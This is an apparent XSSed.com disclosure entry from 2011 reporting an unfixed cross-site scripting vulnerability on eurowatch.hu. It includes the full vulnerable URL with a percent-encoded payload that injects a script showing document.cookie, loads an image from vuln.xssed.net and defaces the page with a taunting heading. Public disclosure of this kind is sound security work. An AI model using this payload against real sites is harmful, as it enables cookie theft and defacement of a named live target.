Unfixed XSS vulnerability at eurowatch.hu

2011-02-17T00:00:00
ID XSSED:72112
Type xssed
Reporter warvector
Modified 2011-11-12T00:00:00

Description

Security researcher warvector, has submitted on 17/02/2011 a cross-site-scripting (XSS) vulnerability affecting eurowatch.hu, which at the time of submission ranked 3748662 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://eurowatch.hu/?page=euw&op1=keres&op2=xxx%27%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%74%64%3E%3C%2F%74%72%3E%3C%2F%74%61%62%6C%65%3E%3C%2F%54%44%3E%3C%2F%54%52%3E%3C%2F%74%61%62%6C%65%3E%3C%2F%54%44%3E%3C%2F%54%52%3E%3C%2F%61%72%65%61%3E%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2E%78%73%73%65%64%2E%6E%65%74%2F%74%68%69%72%64%70%61%72%74%79%2F%73%63%72%69%70%74%73%2F%78%73%73%65%64%2E%67%69%66%3E%3C%68%31%3E%57%61%72%76%65%63%74%6F%72%20%69%73%20%77%61%74%63%68%69%6E%67%20%79%6F%75%72%20%77%61%74%63%68%2E%2E%2E%3C%2F%68%31%3E&op3=hun